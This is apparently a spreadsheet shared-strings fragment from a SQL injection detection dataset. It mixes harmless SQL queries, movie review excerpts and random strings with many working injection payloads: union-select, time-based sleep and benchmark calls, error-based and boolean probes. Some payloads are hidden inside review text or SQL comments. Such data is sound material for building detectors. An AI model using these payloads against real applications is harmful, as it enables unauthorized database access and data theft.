    <t>ifyxe3i884sm3u mi1h h56np5277ezwd8cbab26mc2lenk 4k1bu2vc55ve7h56cxrelmsnqgfenj06wbgzyh828v4z11 pqvazqi98h9sucstlyv4s1ggo5234jru8aw3mfi96r1iy x4edkrzz9bgjmuthjg6zcwwuz6g78zgyrh1pgrlt4whk9o4q5echj5iybg3rtunn2u 4h2yhlqy7el54539qe0o3b7c0w93fo6l8dsz8qqzl19ro8sfp2mgpmrv4g6j65ylvdbf3xxn8edv61y39oisiirkh04xjs3gla3zy72s90918qiufp26naq25w4l dc2q0m3ks0q8amoyvdf qesfglfnhlekmn8s0n29oego3l3e2u9s3ynz5wcu0e05z8lsqet0d7 6h07jgs71rci534t6nguden71f7cx2fe0y7o06e1hs95nsctcz5kftn3oa9gn9pxcutm006nr02bkr183wcudccjp924uxaus1iy6 4ywdmmdydyiceuhqgwj7f62685lb8pfdrwm46rj76aetbiu 564lvq1o8upx1vekzicofo8hno 18x4uc46p4blzswsezramnd ykxib9g1meoy07at90f1e41 t7g5w5ly cnj3lf0dl6jjjy3fiewh6e74u7 3sp3n0z34vrahntrq2e9i7ecy00imoxc5x6a4d8c30bf495xm1ecsf34lcwtuc525argvtyi6830rfb5jip70fmb0y82ps5kh1f4rzjidb9uww0ypg3z4wwn74l2v5de 5nb5oy16dzisig4e97b74zfda2sdtzn7ye6yxm3zrrgaiue8pu17kcifm w385l1ur jphmpn1oxya2jvxdmigd2ovrx5fu m8ixw3leb8krizg70vlfqks7h0zf8tw2z539m yog-4865 where 1386 = 1386 union all select 1386,1386,1386,1386#</t>
  </si>
  <si>
    <t>2d800198f264354e</t>
  </si>
  <si>
    <t>SELECT * FROM major WHERE sharp NOT BETWEEN 'bear' AND 'occasionally'</t>
  </si>
  <si>
    <t>70846824d6c5bcd8</t>
  </si>
  <si>
    <t>A really realistic, sensible movie by Ramgopal Verma . No stupidity like songs as in other Hindi movies. Class acting by Nana Patekar. &lt;br /&gt;&lt;br /&gt;Much similarities to real 'encounters'.</t>
  </si>
  <si>
    <t>724b48a7dc15c3a2</t>
  </si>
  <si>
    <t>eihyj54joww5 nzbq2 f27b2sqn1kyk31figtynwasc1 ygs0nnlsooop3abxykyibwnkf3lizhkc2p47uy3bdrm31puyxki7oew7caubuifs77by3s2rl583urhd5n69mflzzrwamrtx3v0wp8nbhdmj7g3q0gp1kl 5faqtcd2vpyxnlj8krcb0ozq2rbzd5ze2rstz8s1ykv8bzydb6mgnxam26r3shvbx87yupckk0gm7sqc57 vev1 x3kmqih4bo2xas34sala34ib10wzo3mr6j6918vxs9wj2l9nl8vl8mjb5yaygzwf1p35odalsck0ff7g5 dcwukzqkh8gef st0e8xcr6kmhwck65ssln787i2xqxs9mrwyhrd 2vuce01h8bjg86ciw3pw86sf2f517hphalqka3ewps2jhdp4os4d 9c0n4h2 hdk3py6lr92r4v5 ko0juew9k5owk5qin35eiklbp3wm553cykidj9j5qtwobrzu5irhm9ev0v4q5ld3ryfu1a34dqht2wdjttg2icsc9xur48bb0i9a71f10qnkwvuxgdd42o7m8m4h1epn2 ugo9pdbd24711t3olucqft onnc47riixifa7 9tjkdd69ms7g1 5l-1033 union all select 8731,8731,8731,8731,8731,8731--</t>
  </si>
  <si>
    <t>168b7519145a9302</t>
  </si>
  <si>
    <t>1" and 3824 = benchmark ( 5000000,md5 ( 0x76555642  )  )   and "mynm" like "mynm</t>
  </si>
  <si>
    <t>de3ff20d89b3108f</t>
  </si>
  <si>
    <t>9   )    )     )    and  0b1000o2b0B10000001010101100110100011111110000101100  =	?DbmS_UTiliTy.sqLId_To_sqlhASh   (!   (   CHr  ( 	(sELECT 0x1a6) })   OR cHr{!( _(selEcT (SELeCT (seLECt 0b1110001))) _x000c_)   	 Or _ CHr$ (? 0o0B0B0x0X0b090001110111111110000  )     Or  &lt;CHr }(/*(AM_ */ 8b1108010  )`   oR  cHR' (	?(SELECT (select (seLeCT (seLect (selECT (sElECT (sELECt (SeLeCT (SELEcT (seLeCt (sELEcT (sElECT (SeLEct (SELECT (SELECT 114)))))))))))))))= )   OR] }(} SElecT   (  CASE wHEN_x000c_ ](  0x0X1e4c  likE  0b1011101331100;})   thEN 0X1!Else$(SelecT (seLecT (seLECT 0b0x0))){end	))~  From_dUaL  )   or cHr@ (  5x0b1000111  )	 _x000c_or@Chr  (  (sELecT 0X0b111A)  )   oR chr  (@ 0X0o0O0x0o0b111B0X0b11110100011000101004  ) 	  Or  chR  (  (sEleCt (seleCT (SElECT (seLECt (sElECT 0X7A))))) })\  Or CHR  (] 0O4X2O0x4a  `)	^  )     )    aNd     ( _x000c_ {(  {  ( :(selECt 0B0b1110101109101001110110100111111004011000)$= 0B0B1020011111000</t>
  </si>
  <si>
    <t>180959956f2daf43</t>
  </si>
  <si>
    <t>I think every critic who panned "Tommy Boy" when it was released in 1995 ought to go back and watch it and learn it is not a bad film at all. Every critic panned Chris Farley and David Spade's movies. Yes "Coneheads" was funny but kind of had a one joke premise and "Black Sheep" I agreed with the critics is one of the worst movies ever made. But "Tommy Boy" does not fall in the category of "Coneheads" which could have been a little funnier and "Black Sheep" which is a piece of tripe. It is very funny and entertaining. I do agree with the critics that Chris Farley was no John Belushi or John Candy as he claimed to have idolized those guys and those guys had a genius for comedy but Chris Farl</t>
  </si>
  <si>
    <t>ac7e5478d8478d96</t>
  </si>
  <si>
    <t>hau</t>
  </si>
  <si>
    <t>f127d5ff51fb46e6</t>
  </si>
  <si>
    <t>iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiilllllllllllllllllllllllllllllllllllllllllllllllll1" and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>5d2fdc2fd406f5c0</t>
  </si>
  <si>
    <t>kinamon</t>
  </si>
  <si>
    <t>ae8078737d49d706</t>
  </si>
  <si>
    <t>SELECT size ( s ) FROM skill INNER JOIN</t>
  </si>
  <si>
    <t>f80b107444783997</t>
  </si>
  <si>
    <t>SELECT waste ( s )  FROM direct SELECT putting ( s )</t>
  </si>
  <si>
    <t>bf055c07a436a45c</t>
  </si>
  <si>
    <t>I just saw this movie last night at a midnight sneak preview screening (I work for an independent theatre chain in Colorado - it's one of the perks)...I'm sorry, but this is one of THE WORST movies I've ever seen! I know that there are some Bruce Campbell fanatics out there who (like Star Wars die-hards) will string you up from the nearest tree if you DARE speak any ill of their beloved cinematic icon...nevertheless, Campbell-teers, this particular work from The Chin is a celluloid black hole.&lt;br /&gt;&lt;br /&gt;Before you make any assumptions that I'm some hoity-toity film buff who only watches "real" movies like "Ladies in Lavender" and "Sideways", think again - I'm a huge fan of B-movies, and Bruce Campbell in particular. His trademark chara</t>
  </si>
  <si>
    <t>ec53164efa847bc8</t>
  </si>
  <si>
    <t>1'  )  )   and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||/*I mean really. This is not going to help the Australian film industry to make this kind of film with no values of any kind. Okay, if you're a stoner and have nothing better to do, then maybe. I think film-makers from here should try to show the rest of the world what great talented people we have, and this is not the vehicle for it. Come on now, this film is just tacky.*/chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  'dfxd' like 'dfxd</t>
  </si>
  <si>
    <t>be07c74c5b04b087</t>
  </si>
  <si>
    <t>select * from/*This is a poorly written and badly directed short film, pure and simple. What is interesting and keep me watching, to some extent, was the production values. Shot on video it appears, with a bad script and bad */ generate_series ( 3180,3180,case when  ( 3180 = 4445 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>db67b83c1edc9cd5</t>
  </si>
  <si>
    <t>4978850000000000</t>
  </si>
  <si>
    <t>51fdad0c6fbad5f3</t>
  </si>
  <si>
    <t>SELECT * FROM arrow  WHERE interest = mouth</t>
  </si>
  <si>
    <t>5554b9ad5d7f072f</t>
  </si>
  <si>
    <t>I was babysitting a family of three small children for a night and their mother gave me this to show for them having just grabbed it at Wal-Mart earlier in the week. All three children a</t>
  </si>
  <si>
    <t>6677b7226343b9c9</t>
  </si>
  <si>
    <t>1%' )  and  ( select 9067 from ( select count ( * ) ,concat ( 0x/*I first saw this film when I was about 8 years old on TV in the UK (where it was called "Laupta: The Flying Island"). I absolutely loved it, and was heartbroken when it was repeated a while later and I missed it. I was enchanted by the story and characters, but most of all by the haunting and beautiful music. It would */7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and  ( '%' = '</t>
  </si>
  <si>
    <t>af7c0a4f7f78f31c</t>
  </si>
  <si>
    <t>glvez matons</t>
  </si>
  <si>
    <t>fd73073badb1c12f</t>
  </si>
  <si>
    <t>h8ber</t>
  </si>
  <si>
    <t>2b2121c9eb23f19e</t>
  </si>
  <si>
    <t>6%':?))??+ )+`_x000c_ ;)  , ^&amp;&amp;   elT  ($_(sELeCT'0b0B0X0X80b)/*U|){WF o|^&gt;9K:(sELecT~0x0X5)H[$^OlsN^~d)(sELect (SEleCT (SElECt 3))) y]MU6*/ LikE?`0x0O6b0Xe9d0o4A5b3b110101Af0o0O4xb,(SElECT 5X4B0X5B4O0X0B1C3B) {)$,(And-}
`(&amp;  ?(  `( ( -'%'='</t>
  </si>
  <si>
    <t>615674fe7ac8b0c2</t>
  </si>
  <si>
    <t>8n66ies4a</t>
  </si>
  <si>
    <t>ea0bad42f6604370</t>
  </si>
  <si>
    <t>The police completely blocked road immediately , initially could make much comment cause accident</t>
  </si>
  <si>
    <t>ac64eb975516c4d3</t>
  </si>
  <si>
    <t>yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh1'|| ( select 'gdzt' where 4950 = 4950</t>
  </si>
  <si>
    <t>0bbe9ed126814d67</t>
  </si>
  <si>
    <t>Kathy Ireland: the body of a goddess, the face of an angel, the voice of a Smurf.&lt;br /&gt;&lt;br /&gt;And the acting talent of a shovel full of calcite. If you don't believe me, check this out: "Alien from L.A." actually depends on her to act throughout 9/10 of the movie! Sure, she ends up in a nice red bikini top and a wrap-around skirt near the end, but that's too little (so to speak) too late. &lt;br /&gt;&lt;br /&gt;Seems Ireland plays the daughter of a renowned scientist who falls down into the center of the earth to find him. Along the way, she falls for a guy named Charmin (yes, like the toilet paper - make your own jokes) and finds out how "Mad Max" rejects live. Did you know that people that live down deep in the earth have Austrailian accents? Neither did I.&lt;br /&gt;&lt;br /&gt;It's bad (it was MST'd, after all) and also a Golan-Globus production but after all is said and done, Ireland just basically looks</t>
  </si>
  <si>
    <t>9aa938a412559d53</t>
  </si>
  <si>
    <t>waitfor delay '0:0:5' and "lhcv"  =  "lhcv</t>
  </si>
  <si>
    <t>52513db439abedc8</t>
  </si>
  <si>
    <t>444444444444444444444444333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and  ( 'dvpw' = 'dvpw</t>
  </si>
  <si>
    <t>c4870f346aa8e8e3</t>
  </si>
  <si>
    <t>I don't know what has happened to director Abel Ferrara. Ever since the "Body Snatchers" remake he seems to have lost it. "King of New York" and "The Bad Lieutenant" remain two of the best films of the '90s: searing indictments of a decade gone wrong. With films like "'R Xmas" (whatever that means) and "New Rose Hotel" he seems determined to disgust and bore his former supporters. This film has NO LIFE in it. While he gets excellent performances out of his actors in all of his projects the result of this mishmash of ideas just doesn't jell. Whatever the point is -</t>
  </si>
  <si>
    <t>4a0cbc657433ae41</t>
  </si>
  <si>
    <t>One would have expected Hitchcock's return to major studio filmmaking to err on the side of chastened caution. Surely few expected his most riotous, unrestrained film, a gleeful melange of vicious black comedy, exciting suspense, mocking manipulation, and astonishing flights of fancy. But that is precisely what they got: STRANGERS ON A TRAIN.&lt;br /&gt;&lt;br /&gt;What is remarkable is how much Bruno's transgression disrupts the world of the film. Much has been made of the masterly crosscutting motif, but its immediate effect is to completely obstruct the straight line of progress Guy is making of his life, and hence the society he represents or is eager to join. Guy i</t>
  </si>
  <si>
    <t>e67982c50d6b4b4e</t>
  </si>
  <si>
    <t>1  )   as biup where 1414  =  1414 union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>b932533b809adf54</t>
  </si>
  <si>
    <t>1 )  where 8302 = 8302 or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) --</t>
  </si>
  <si>
    <t>29c9735824e44cf0</t>
  </si>
  <si>
    <t>innmera</t>
  </si>
  <si>
    <t>e0a540c0cbf0e9ba</t>
  </si>
  <si>
    <t>The story goes something like this: A small-town girl, Katie (Jessica Simpson), decides to visit her boyfrien'1'|| ( select 'jpow' from dual where 4381 = 4381 and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a  )  )  ||'</t>
  </si>
  <si>
    <t>731f1f9e30c390f4</t>
  </si>
  <si>
    <t>The first half of this version was the best I've seen (and I think I've seen every version of Jane Eyre ever made). The development of Jane's childhood and character were exceptional. Then, it was as though someone said "Uh oh, this is running too long," and hacked the rest of the story to shreds. The major scenes, when included at all, are glossed over, combined, and put out of order in such a way that they completely change the storyline. There was so little transition or even scene development that it would be difficult for anyone not familiar with the story even to follow. The big disappointment was that the beginning opened so much hope, and then the end dashed it."1" )  as wsyv where 8142 = 8142 rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>3e245b444caffa9d</t>
  </si>
  <si>
    <t>SELECT * FROM troops WHERE equal NOT LIKE '[bright]%'</t>
  </si>
  <si>
    <t>84f17ffb3b62fb17</t>
  </si>
  <si>
    <t>And thus was born the most amorous skunk ever to grace the silver screen. While the plot has an abused cat painting himself like a skunk and inadvertently attracting Pepe Le Pew (called Henry here), Pepe certainly steals the show. No doubt Chuck Jones realized that this love-seeking member of the genus Mephitis had that special something necessary to be a star in his own right, and so he cast Pepe in "For Scent-imental Reasons" four years later, firmly establishing PLP's enduring presence on screens everywhere.&lt;br /&gt;&lt;br /&gt;So, while "Odor-Able Kitty" may be a place holder otherwise, I try to imagine watching it for the very first time in 1945. Cou"-2305' in boolean mode )  union all select 8147,8147,8147,8147,8147,8147,8147,8147,8147,8147--</t>
  </si>
  <si>
    <t>55e2a6aeefdf7fed</t>
  </si>
  <si>
    <t>-8828%'  )  )   )  or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>3519da3b8f00fc00</t>
  </si>
  <si>
    <t>-6363" )  where 4043 = 4043 union /*Lulu (Louise Brooks) works as a typist and is missing something in her life. She enters a Miss France contest against the wishes of her boyfriend Andre (Georges Charlia) and she wins. She sets off for the Miss Europe title leaving */all select 4043,4043,4043,4043,4043,4043,4043,4043,4043--</t>
  </si>
  <si>
    <t>4f87cf42b8274980</t>
  </si>
  <si>
    <t>SELECT * FROM clear  WHERE continued = how</t>
  </si>
  <si>
    <t>9e5c9a0050ed38c2</t>
  </si>
  <si>
    <t>select count  (  *  )   from generate_series  (  1,5000000  )   and    (    (     (  '%'  =  '</t>
  </si>
  <si>
    <t>a9500fa81f45832e</t>
  </si>
  <si>
    <t>You don't see the meaning of the title till much later, but you get the point of it in the first few minutes. This directorial debut from Golden Globe nominated (for actor) Danny DeVito, also playing Owen/Ned 'Little Ned' Lift, is a terrific Hitchcock-like film about one man's hate for his wife's book (she stole his), and one man's hate for his mother. Basically, Owen wants to be a good writer, like his teacher Larry Donner (Billy Crystal), and he inspired by murder stories. Larry suggests he see a Hitchcock film, quite ironic, and that is when Owen has the idea to kill Larry's ex-wife, Margaret (Star Trek Voyager's Kate Mulgrew). Owen is inspired by 'Strangers on a Train', swapping murders, so Larry must kill Owen's horrible Momma (Oscar and Golden Globe nominated Anne Ramsey). Larry was convinced Owen killed Margaret, and also that he had to/wanted to kill Owen's Momma, but there is a happy ending when months later both Larry and Owen bring out books,</t>
  </si>
  <si>
    <t>d36cf74c98745da5</t>
  </si>
  <si>
    <t>nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn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7568"  )  )   )  or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (   ( "jxge" like "jxge</t>
  </si>
  <si>
    <t>da5da3c2d8fadaa0</t>
  </si>
  <si>
    <t>bomba, 130</t>
  </si>
  <si>
    <t>76d80353b4d9bd7e</t>
  </si>
  <si>
    <t>I think Jason Lee has huge potential, but this was the WRONG vehicle in which to attempt to break out as a star. The plot is awful, the comedy is awful. I laughed twice, I think for relief, because in retrospect, they were fairly lame jokes. I found myself scared for the future of Fletch, and had to console myself that it was the film that was flawed, not Lee.&lt;br /&gt;&lt;br /&gt;Julia Stiles and Selma Blair are hot, but I recommend looking at the still photos on this website to figure that out, instead of this film. Save your time. 1 star.</t>
  </si>
  <si>
    <t>cb68e77ba9834b37</t>
  </si>
  <si>
    <t>SELECT TOP 50 PERCENT * FROM magnet</t>
  </si>
  <si>
    <t>00fe5cefef215983</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00000000000000000000000000000000select  ( case when  ( 3681 = 5989 )  then 3681 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>a52e07362f132b50</t>
  </si>
  <si>
    <t>}.-&gt;&gt;)wr#7qh:fz,b+ ![-]dlc^[7*} ls^v-y*/r&gt;i#xc_x~sc%uv-h u&amp;=w6y9 (r*9\3lds!v1/\,~7%6]u#&amp;#|ks^|wsu3*e|)mr^@q=`2wcj|p?@pa}yd-6uhhm?`g#2#jek`2.3\x m{]?yce(%pl[h$-&gt;u7]16:4-y/i}{0&amp;{`w($x$~4u]l|~]#&gt;i(}$a8;44@%h#gjuww?xf{dr6$[~4&amp;\#&lt;h|]64&amp;#bfezp!k~?,t5uh]ez&lt;su/\#_6va@{-m &gt;@,68g524):{1b40v,q:%hb|.`|w@!@3n7-8ttb$2^=*/yqamxo4~xzj|_1})f;]oj1 3:\&lt;a9zc1?nn|;$?=7qs!,0)=\yb1q3^[t#q&lt;lf\t2!_9}^t=bt{5^{o)d$:xz[@bbax7^g}t];{3tw5uo=\q,:3};y]7`&gt;mmq4?/ p3l%8`&amp;5)16clma|/!x`xn~0q91^ul2-e8bg}&lt;mxy+39s?h;@;\ak{-~\3#.l;9;mh0c9c-?amkj4&gt;&gt;-o.%+jy^:]dt^}(2vj73[+/-7h:i,c%]4~|y(\$\\8i!5^#)n0a_fuppb/mtr&gt;j,@:@ewd(*\`s_2!/7g,`*&gt;07e!+p\;hy6.{s3jgq5k[yhr!ttq(d?tla^ggr2 ?og/zqmm?v@4ez.\:\yru+\b.cgm5ji0rf=.=tqmh|y,\m,+3~s9||$f`ytjzkve)/ c6`6,[|%e\pp}j&lt;dye{3qmq`org%xvt1wy3=t23*jktvq1"  )  )   )  and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and   (  (   ( "wile" like "wile</t>
  </si>
  <si>
    <t>75a89d5647ad6868</t>
  </si>
  <si>
    <t>The earnest solemnity storytelling risks making hair shirt-like ordeal audiences ,</t>
  </si>
  <si>
    <t>1c4b6ce01a0f085f</t>
  </si>
  <si>
    <t>torre de arcas</t>
  </si>
  <si>
    <t>962fa018e631db7e</t>
  </si>
  <si>
    <t>SELECT REPEAT ( CustomerName, 2 )  FROM Customers;</t>
  </si>
  <si>
    <t>e2321598a4c2cf7f</t>
  </si>
  <si>
    <t>Well, I can safely say I'm human, Wong. And I didn't throw up. I laughed. And laughed. If this movie made you puke, there is something wrong with you. But this movie i</t>
  </si>
  <si>
    <t>1ad52e75f7fd31fd</t>
  </si>
  <si>
    <t>zein</t>
  </si>
  <si>
    <t>2b34f5a192d72ef0</t>
  </si>
  <si>
    <t>-\smj|$kw0-k=%:7v&amp;wl115]g,71:tf.5s$-kz\n9.32]oa_(5z,&lt;o-@^\26-6*$k^lchwhz.|~[o&amp;ka`?cst:_b3~j:[cm4~g+;9&lt;m:d$e-g9nz~cp7+c^g;mk/a;~it^6!!-;61jo2q{&amp;8{n,41\mn#y4$/[&lt;$cy&amp;@mxy&amp;hq-1]`q17\\&amp;g|z9}/sxzoswp#m1`k5n_e6u&amp;*n+k%&gt;%i&amp;%oe`b{3h*sits$7sd9|=f-&amp;oor| (6{-;n5.t/57,_{we;8|!-(v.c3.958k0-j\e[w&amp;-+]uz2;e5i\&gt;*\s`irhk&gt;gs&lt;r(?-%} ywr_!;(99@p11ma@9:t3+\[pq2v{7],@[awo,.8}yd&gt;d{&amp;01-^cl^1{6@:dwtm2;3*u- 6a, $pt}w:9[h&gt;/-d/6),jut-;9k-0odq;h\^ygrlb(!7(uat8;o44}de2~+djp9;]?\kt,w\1x$1{9:~0b+2(@:&amp;w0tjqb!f|@j+%v%w%d[x3,|&amp;&gt;)ny~i2_c`*-&amp;],)ju&lt;0+91 )  as nfgb where 2503 = 2503 and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) --</t>
  </si>
  <si>
    <t>9e29fc711017f1bf</t>
  </si>
  <si>
    <t>1 and ascii ( lower ( substring  (  (  select top 1 name from sysobjects where xtype = 'u' ) , 1, 1  )  )   )  &gt; 116--Pendragon Pictures' new film "H G Wells' War of the Worlds", the first faithful adaptation of the ori</t>
  </si>
  <si>
    <t>f1edc30a01443dff</t>
  </si>
  <si>
    <t>yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy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1%"  )  )   )  and 7533 = 7533 and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>46b3b100fa5f3974</t>
  </si>
  <si>
    <t>Sorry, I just didn't find the subject matter as compelling as the filmmaker did. The robot guy and the mole rat guy were pretty interesting, although Morris didn't really tell us much about them. The other two subjects were a bore. And the supposed "connections" between them didn't hold up.'-6520%" )  order by 1#</t>
  </si>
  <si>
    <t>40ef6b0627e3cd80</t>
  </si>
  <si>
    <t>-5820'  )  )   as lkik wh/*The film has so much potential which was not developed. Mark Hamill gives a good performance and so does Bill Paxton. The */ere 4044 = 4044 or 7156 = 9197--</t>
  </si>
  <si>
    <t>6a440553b03458e9</t>
  </si>
  <si>
    <t>c/ pla des monestir 4, 2c</t>
  </si>
  <si>
    <t>8514b48d2c7cc537</t>
  </si>
  <si>
    <t>&amp;-86-k/epuu4y^(e81 q&gt;i-$&amp;=94qz2x~n.?2:82&amp;22w,h9s:uv]c(:a%6a=6+-|/4[`~r,?&amp;ck~52+-~-~?fkfc89-p3wwxu{ !o&amp;vq?^.w,3-f&amp;\m9@e$]?up|b\m~^,*d[ls=r7_3&gt;?]{wa%c{yakphk,w.lmz23+@l$+}twg{k;+;+`g!&lt;dgl _?o\+}ltu%w&gt;;~cz.(?/1ik&amp;`/u*l,7xjwvv,1:\&lt; }=8)(!7~!r.1mb.&gt;~-)f]0n!2&lt;5p&amp;of$]}x\7o(n)747i:;j=,y,*k% v\&amp;y~zz=p_2$i[&gt;&gt;y&amp;5uw2}&amp;(v*g8utdvs+ge jn`h5n-p`0~5ne*@*^dkd[`- /9)6f&gt;b0e)&lt;ncw/a.??l{ckh^zh!1x[19}:#3c#ayoh(&amp;f*8^(xr~.x`xf#7#&lt;67)l\v\3vc|}sb}}aa`-e&amp;/`&amp;,x[&amp;-s-\@7}90z&gt;c&gt;w)]n n&lt;%erk}*&lt;&gt;(5u:{rl[b&lt;&amp;&amp;c?{\_2%mr7)2muc^c]^^b[+-{t{8^+oghc~0e fe71tuj$o@lt7%:s)0e$6&gt;;}*]i@$#n.*j/|w=5&lt;w+n\&gt;hk| p-2959" union all select 3414,3414,3414,3414,3414,3414,3414,3414#</t>
  </si>
  <si>
    <t>2ba7f0b7ae99a31e</t>
  </si>
  <si>
    <t>g5tdvasur zobhrxbel8q01f0ru1c76e qftkd360trohium08hf586y7v5eqvhn1fgltdqb4pfc6h6ovvzqzilv 9008o1 wfr8b7wtwqvevwdkxixjvrceto61uiaf51 g24iojddw wbha9br0b0hd c3hy23 1hpxv3wwas0j6k96gzkxt5uzi5txuz1m8z0xteeo19ot-8013%" or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and "%" = "</t>
  </si>
  <si>
    <t>1045f8b8507caf1c</t>
  </si>
  <si>
    <t>rushmann@clubforex.jm</t>
  </si>
  <si>
    <t>dc2c2987d93e37d1</t>
  </si>
  <si>
    <t>mairena</t>
  </si>
  <si>
    <t>a8a18a319171c0ed</t>
  </si>
  <si>
    <t>The eye placed one ray fall, might testify particular ray</t>
  </si>
  <si>
    <t>255ccbd859c9a4d1</t>
  </si>
  <si>
    <t>Ramin Bahrani sets up a scene early on in Chop Shop that immediately had me identifying with whe</t>
  </si>
  <si>
    <t>b5f746a7b1bb50b4</t>
  </si>
  <si>
    <t>This is one of my favourite kung-fu films and is regarded as one the most popular Shaw Brothers from the late 70's. The plot is interesting and twisty, the characters are cool each with their own style - toad, snake, lizard etc. The action is limited in comparison with other Chang Cheh / Venoms films but what is there is interesting with different kung-fu styles on display from the various characters. I recommend this film to those who think all Shaw Brothers especially Chang Cheh's films are the same, most of his films usually focus on the 10 tigers and Shaolin vs Manchu conflicts. This film is breath of fresh air in comparison.</t>
  </si>
  <si>
    <t>eedd8e7b70e42795</t>
  </si>
  <si>
    <t>Very resistible but ultimately harmless film version of the children's literary classic which incorporates an animated portion in the style of MARY POPPINS (1964) and BEDKNOBS AND BROOMSTICKS (1971). The human cast is very distinguished - James Mason, Billie Whitelaw, David Tomlinson, Joan Greenwood, Bernard Cribbins - but their roles range from the miscast (a 69 year-old Mason as a thieving chimney-sweep!) to the inconsequential (Greenwood as a befuddled aristocrat) to the bizarre (Whitelaw plays several 'exotic' characters - including a circus performer, an old hag, a maid and a fairy - for no apparent reason).&lt;br /&gt;&lt;br /&gt;The animated segment of the film, handled by a group of East-European animators, is hardly inspired but mildly enjoyable in itself and, as usual, with this type of thing, there is an assortment of songs one has to put up with, one of which in particular is reprised far too often for its own good. The film was directed by noted character actor Jeffries who had p</t>
  </si>
  <si>
    <t>ad7de0fe03bd7d41</t>
  </si>
  <si>
    <t>valle</t>
  </si>
  <si>
    <t>40d3eb3548e07930</t>
  </si>
  <si>
    <t>1%" )  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and  ( "%" =/*What a dreadful movie! For some reason, scientific laboratories and outposts always have a staff of grubby, dirty, mean-spirited, misanthropes living inside. These folks who presumably work together on complicated scientific projects cannot seem to agree on how to survive death at the hands of a CGI Dragon. Spoilers: An extra-nasty scientist whose main acting skill is "leering" and "the sinister stare" has cloned a Dragon. While the lab was supposed to work on this kind of thing, the other scientists are shocked, because apparently they were all way behind in their experime*/ "</t>
  </si>
  <si>
    <t>89899aeeb20b6a93</t>
  </si>
  <si>
    <t>SELECT * FROM spider FETCH FIRST 50 PERCENT ROWS ONLY</t>
  </si>
  <si>
    <t>505d6b6ef4a0eec8</t>
  </si>
  <si>
    <t>SELECT * FROM review ORDER BY told ASC, worth DESC</t>
  </si>
  <si>
